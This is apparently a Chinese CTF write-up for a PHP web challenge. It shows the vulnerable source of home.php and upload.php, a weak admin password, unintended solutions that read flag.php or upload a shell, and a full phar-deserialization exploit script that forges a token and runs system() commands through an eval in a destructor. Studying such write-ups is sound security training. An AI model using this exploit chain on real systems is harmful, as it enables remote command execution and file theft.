开始以为是sql注入
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ST1jvadM-1691302941344)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032140269.png)]
账号为:admin,一直试都没反应,后来发现可以弱口令,密码:password
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PKuBGWCd-1691302941344)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032141726.png)]
一个文件上传页面:
在file参数存在文件包含:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eLLkRDru-1691302941345)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032143134.png)]
home.php
session_start();
echo " Home ";
error_reporting(0);
if(isset($_SESSION['user'])){
if(isset($_GET['file'])){
if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
die("hacker!");
}
else{
if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
$file = $_GET['file'].".php";
}
else{
$file = $_GET['file'].".fxxkyou!";
}
echo "当前引用的是 ".$file;
require $file;
}
}
else{
die("no permission!");
}
}
?>
upload.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<form action="" method="post" enctype="multipart/form-data">
上传文件
<input type="file" name="file" />
<input type="submit" name="submit" value="上传" />
</form>
<?php
error_reporting(0);
class Uploader{
public $Filename;
public $cmd;
public $token;
function __construct(){
$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
$ext = ".txt";
@mkdir($sandbox, 0777, true);
if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
$this->Filename = $_GET['name'];
}
else{
$this->Filename = $sandbox.$_SESSION['user'].$ext;
}
$this->cmd = "echo '
Master, I want to study rizhan!
';";
$this->token = $_SESSION['user'];
}
function upload($file){
global $sandbox;
global $ext;
if(preg_match("[^a-z0-9]", $this->Filename)){
$this->cmd = "die('illegal filename!');";
}
else{
if($file['size'] > 1024){
$this->cmd = "die('you are too big (′▽`〃)');";
}
else{
$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
}
}
}
function __toString(){
global $sandbox;
global $ext;
// return $sandbox.$this->Filename.$ext;
return $this->Filename;
}
function __destruct(){
if($this->token != $_SESSION['user']){
$this->cmd = "die('check token falied!');";
}
eval($this->cmd);
}
}
if(isset($_FILES['file'])) {
$uploader = new Uploader();
$uploader->upload($_FILES["file"]);
if(@file_get_contents($uploader)){
echo "下面是你上传的文件:
".$uploader."
";
echo file_get_contents($uploader);
}
}
?>
这题有两个非预期解:
if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
$this->Filename = $_GET['name'];
}
if(@file_get_contents($uploader)){
echo "下面是你上传的文件:
".$uploader."
";
echo file_get_contents($uploader);
}
我们可以控制文件名的参数,并且获取文件名的文件内容
非预期解1:
我们直接读flag.php:
非预期解2:
我们可以直接上传一个shell:
预期解:
phar反序列化
难点主要是需要绕过:token
function __destruct(){
if($this->token != $_SESSION['user']){
$this->cmd = "die('check token falied!');";
}
eval($this->cmd);
}
但是如果上次文件不加name参数,会讲session写入文件名:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6eEMtHuE-1691302941346)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032150189.png)]
随便上传一个文件,获取token
构造phar文件:
class Uploader{
public $Filename;
public $cmd = "system('tac /var/www/html/flag.php');";
public $token = "GXY2088cabe1723182d413a31dd560b1766";
}
@unlink("phar.phar"); //先删除存在的phar.phar
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub(''); //设置stub
$o = new Uploader();
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
我们将phar文件上传上去:
然后在文件名中包含phar://
,配合file_get_contents()
就会将phar反序列化,获得flag